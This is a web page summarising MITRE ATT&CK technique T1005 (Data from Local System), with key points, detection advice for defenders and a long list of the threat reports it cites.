MITRE

MITRE Technique [T1005] Data from Local System

MITRE

[T1005 ] Data from Local System โ€“ Adversaries search local files, configurations, virtual machine images, and local databases to find sensitive data for later exfiltration; monitoring command activity and system APIs helps detect this behavior. #DataFromLocalSystem #T1005

Keypoints

  • Adversaries enumerate file systems and local stores to locate sensitive data quickly.
  • Command and scripting interpreters like cmd, PowerShell, and network CLIs are commonly used.
  • Automated collection tools and scripts increase speed and reduce manual footprint.
  • Monitor process creation, command-line arguments, and OS API calls for suspicious access.
  • Collect and analyze AAA and CLI logs on network devices to catch configuration exfiltration.

Description:

  • Like a burglar rifling through drawers and safes inside a house, adversaries search a systemโ€™s local files and settings to find valuable information before leaving with it.
  • Adversaries use local file access, scripting interpreters, management APIs, and device CLIs to gather files, configuration data, and databases; this enables targeted exfiltration and persistence, making early detection critical to prevent data loss.

Detection:

  • Monitor process creation and command-line arguments for file collection patterns, using EDR to capture full command-line and parent process context.
  • Alert on suspicious use of scripting interpreters (PowerShell, cmd, bash) performing bulk file reads or archive creation; enable PowerShell/Script Block logging and transcription.
  • Capture and analyze OS API file access events (ReadFile, NtCreateFile) for unusual volume or access to sensitive directories; use native auditing or kernel-level sensors.
  • Collect AAA and CLI logs from network devices and alert on unexpected show/config retrieval commands and file copy actions from non-standard accounts or locations.
  • Monitor Windows management tools (WMI, WinRM) for remote queries and scripted file enumeration; correlate with unexpected logon locations or lateral movement indicators.
  • Implement file integrity monitoring and DLP rules to flag mass reads of sensitive file types and VM disk images; tune policies to reduce false positives from backups and maintenance.
  • Use behavioral baselines and anomaly detection to spot deviations in file access patterns; combine telemetry from EDR, SIEM, and network logs for context-rich alerts and faster investigations.

Tactics:
Collection

Platforms:
ESXi, Linux, Network Devices, Windows, macOS

Data Sources:
Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution

Relationship Citations:
(Citation: Cybereason StrifeWater Feb 2022),(Citation: MalwareBytes WoodyRAT Aug 2022),(Citation: McAfee Night Dragon),(Citation: Kaspersky TajMahal April 2019),(Citation: NCSC Joint Report Public Tools),(Citation: Bitdefender LuminousMoth July 2021),(Citation: group-ib_redcurl1),(Citation: BlackBerry Amadey 2020),(Citation: RiskIQ British Airways September 2018),(Citation: SentinelLabs Metador Sept 2022),(Citation: Cybereason Bumblebee August 2022),(Citation: TrendMicro BKDR_URSNIF.SM),(Citation: Mandiant APT29 Eye Spy Email Nov 22),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Sygnia Elephant Beetle Jan 2022),(Citation: Novetta Blockbuster),(Citation: Wevtutil Microsoft Documentation),(Citation: Microsoft Actinium February 2022),(Citation: ESET EvasivePanda 2023),(Citation: Cybereason Kimsuky November 2020),(Citation: ESET Turla PowerShell May 2019),(Citation: Cobalt Strike TTPs Dec 2017),(Citation: Kaspersky QakBot September 2021),(Citation: Microsoft Analyzing Solorigate Dec 2020),(Citation: TrendMicro Pawn Storm 2019),(Citation: Palo Alto Brute Ratel July 2022),(Citation: SecureWorks August 2019),(Citation: ClearSky Lazarus Aug 2020),(Citation: Secureworks GOLD KINGSWOOD September 2018),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Unit42 CookieMiner Jan 2019),(Citation: Symantec Trojan.Hydraq Jan 2010),(Citation: Talos GravityRAT),(Citation: PowerSploit Documentation),(Citation: Symantec Chafer February 2018),(Citation: FBI FLASH APT39 September 2020),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: ESET Gamaredon June 2020),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: ESET Gelsemium June 2021),(Citation: Scarlet Mimic Jan 2016),(Citation: SentinelOne Lazarus macOS July 2020),(Citation: Trend Micro MacOS Backdoor November 2020),(Citation: ASERT Donot March 2018),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: McAfee GhostSecret),(Citation: CISA AA20-239A BeagleBoyz August 2020),(Citation: Volexity SolarWinds),(Citation: Group IB APT 41 June 2021),(Citation: Citizen Lab Stealth Falcon May 2016),(Citation: ClearSky Siamesekitten August 2021),(Citation: trendmicro xcsset xcode project 2020),(Citation: KISA Operation Muzabi),(Citation: Unit 42 BadPatch Oct 2017),(Citation: Mandiant APT1),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Prevailion DarkWatchman 2021),(Citation: Kaspersky Cloud Atlas August 2019),(Citation: CISA AR21-126A FIVEHANDS May 2021),(Citation: Checkpoint IndigoZebra July 2021),(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023),(Citation: SentinelOne Agrius 2021),(Citation: CISA WellMess July 2020),(Citation: NSA/FBI Drovorub August 2020),(Citation: Accenture Lyceum Targets November 2021),(Citation: Mandiant FIN12 Oct 2021),(Citation: Cylance Dust Storm),(Citation: Lunghi Iron Tiger Linux),(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023),(Citation: F-Secure The Dukes),(Citation: Kaspersky Tomiris Sep 2021),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: ESET Crutch December 2020),(Citation: Check Point Warzone Feb 2020),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: Malwarebytes RokRAT VBA January 2021),(Citation: Palo Alto Rover),(Citation: Accenture MUDCARP March 2019),(Citation: McAfee Honeybee),(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024),(Citation: CyberBit Dtrack),(Citation: Cymmetria Patchwork),(Citation: Secureworks MCMD July 2019),(Citation: Trend Micro Muddy Water March 2021),(Citation: S2W Racoon 2022),(Citation: Kroll RawPOS Jan 2017),(Citation: Symantec Troll Stealer 2024),(Citation: Cybereason Bazar July 2020),(Citation: Red Canary 2021 Threat Detection Report March 2021),(Citation: ESET Machete July 2019),(Citation: Huntress NPPSPY 2022),(Citation: Korean FSI TA505 2020),(Citation: Talos Frankenstein June 2019),(Citation: Secureworks BRONZE SILHOUETTE May 2023),(Citation: Symantec Hydraq Jan 2010),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: Mandiant Suspected Turla Campaign February 2023),(Citation: Mandiant APT41),(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022),(Citation: ESET Dukes October 2019),(Citation: ESET ForSSHe December 2018),(Citation: FireEye Periscope March 2018),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: FoxIT Wocao December 2019),(Citation: BlackBerry CostaRicto November 2020),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: Cybereason Cobalt Kitty 2017),(Citation: aptsim),(Citation: CISA AR18-352A Quasar RAT December 2018),(Citation: Microsoft GALLIUM December 2019),(Citation: DOJ APT10 Dec 2018),(Citation: FireEye APT30),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: Malwarebytes Konni Aug 2021),(Citation: Symantec Linfo May 2012),(Citation: Objective See Green Lambert for OSX Oct 2021),(Citation: PWC WellMess July 2020),(Citation: US-CERT TA18-074A),(Citation: RiskIQ Newegg September 2018),(Citation: FOX-IT May 2016 Mofang),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: Trend Micro Earth Simnavaz October 2024),(Citation: FBI Lockbit 2.0 FEB 2022),(Citation: Kaspersky ToddyCat June 2022),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Trend Micro FIN6 October 2019),(Citation: Symantec Cicada November 2020),(Citation: Securelist Calisto July 2018),(Citation: Symantec FIN8 Jul 2023),(Citation: US-CERT BLINDINGCAN Aug 2020),(Citation: ESET Nomadic Octopus 2018),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: Malwarebytes Kimsuky June 2021),(Citation: Forcepoint Monsoon),(Citation: Symantec Darkmoon Aug 2005),(Citation: Red Canary Qbot),(Citation: Talos Bisonal Mar 2020),(Citation: CISA GRU29155 2024),(Citation:,๏ฟฝberwachung APT28 Forfiles June 2015),(Citation: Trend Micro IXESHE 2012),(Citation: CISA WellMail July 2020),(Citation: Google Cloud APT41 2024),(Citation: Talos Kimsuky Nov 2021),(Citation: SentinelOne FrameworkPOS September 2019),(Citation: Microsoft Iranian Threat Actor Trends November 2021),(Citation: FireEye Fin8 May 2016),(Citation: ESET InvisiMole June 2018),(Citation: TrendMicro RawPOS April 2015),(Citation: Kaspersky LuminousMoth July 2021),(Citation: Talos ZxShell Oct 2014),(Citation: Cisco Talos Bitter Bangladesh May 2022),(Citation: Fidelis njRAT June 2013),(Citation: Crowdstrike HuntReport 2022),(Citation: NCCGroup RokRat Nov 2018),(Citation: Cybereason OperationCuckooBees May 2022),(Citation: CISA MAR SLOTHFULMEDIA October 2020),(Citation: DFIR Phosphorus November 2021),(Citation: Unit42 Agrius 2023),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: Novetta-Axiom),(Citation: GitHub PowerSploit May 2012),(Citation: Eset Ramsay May 2020),(Citation: Cybereason StealBit Exfiltration Tool),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: Malwarebytes Saint Bot April 2021),(Citation: ESET DazzleSpy Jan 2022),(Citation: FireEye MuddyWater Mar 2018),(Citation: Talos TinyTurla September 2021),(Citation: S2 Grupo TrickBot June 2017),(Citation: TrendMicro Taidoor),(Citation: Lee 2013),(Citation: Kaspersky ToddyCat Check Logs October 2023),(Citation: Cybereason PowerLess February 2022),(Citation: PaloAlto Patchwork Mar 2018),(Citation: McAfee Sharpshooter December 2018),(Citation: Volexity UPSTYLE 2024),(Citation: NTT Security Flagpro new December 2021),(Citation: CrowdStrike IceApple May 2022),(Citation: Kaspersky APT Trends Q1 2020),(Citation: Mandiant Pulse Secure Update May 2021),(Citation: Group IB GrimAgent July 2021),(Citation: McAfee Lazarus Jul 2020),(Citation: Volexity Ivanti Zero-Day Exploitation January 2024),(Citation: S2W Troll Stealer 2024),(Citation: Zscaler Lyceum DnsSystem June 2022),(Citation: FSI Andariel Campaign Rifle July 2017),(Citation: HP SVCReady Jun 2022),(Citation: Bitsight Latrodectus June 2024),(Citation: F-Secure Lazarus Cryptocurrency Aug 2020),(Citation: group-ib_redcurl2),(Citation: Mandiant FIN13 Aug 2022),(Citation: Symantec Pasam May 2012),(Citation: DOJ GRU Indictment Jul 2018),(Citation: Lookout Dark Caracal Jan 2018),(Citation: F-Secure Cosmicduke),(Citation: Kaspersky Lyceum October 2021),(Citation: Microsoft NICKEL December 2021),(Citation: Unit 42 PingPull Jun 2022),(Citation: Trustwave Pillowmint June 2020),(Citation: Volexity InkySquid RokRAT August 2021),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: Mandiant Pulse Secure Zero-Day April 2021),(Citation: Profero APT27 December 2020),(Citation: ANSSI Sandworm January 2021),(Citation: FireEye APT37 Feb 2018),(Citation: Mandiant ROADSWEEP August 2022),(Citation: ESET LightNeuron May 2019),(Citation: ClearSky Lebanese Cedar Jan 2021),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: Cadet Blizzard emerges as novel threat actor),(Citation: Rapid7 BlackBasta 2024),(Citation: Microsoft POLONIUM June 2022),(Citation: Github Koadic),(Citation: CheckPoint Bandook Nov 2020),(Citation: Check Point APT35 CharmPower January 2022),(Citation: Cybereason Soft Cell June 2019),(Citation: Antiy CERT Ramsay April 2020),(Citation: Proofpoint TA505 October 2019),(Citation: Trend Micro DRBControl February 2020),(Citation: Novetta Blockbuster RATs),(Citation: Unit 42 Kazuar May 2017),(Citation: Check Point APT34 April 2021),(Citation: SentinelLabs Metador Technical Appendix Sept 2022),(Citation: Mandiant Cutting Edge Part 2 January 2024),(Citation: Rapid7 HAFNIUM Mar 2021),(Citation: Securelist Kimsuky Sept 2013),(Citation: McAfee Bankshot),(Citation: CrowdStrike Carbon Spider August 2021),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Sekoia Raccoon2 2022),(Citation: Microsoft Silk Typhoon MAR 2025),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: Bitdefender Naikon April 2021),(Citation: NCSC Cyclops Blink February 2022),(Citation: Novetta Blockbuster Loaders),(Citation: MoustachedBouncer ESET August 2023),(Citation: MSTIC FoggyWeb September 2021),

Read More: https://attack.mitre.org/techniques/T1005

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint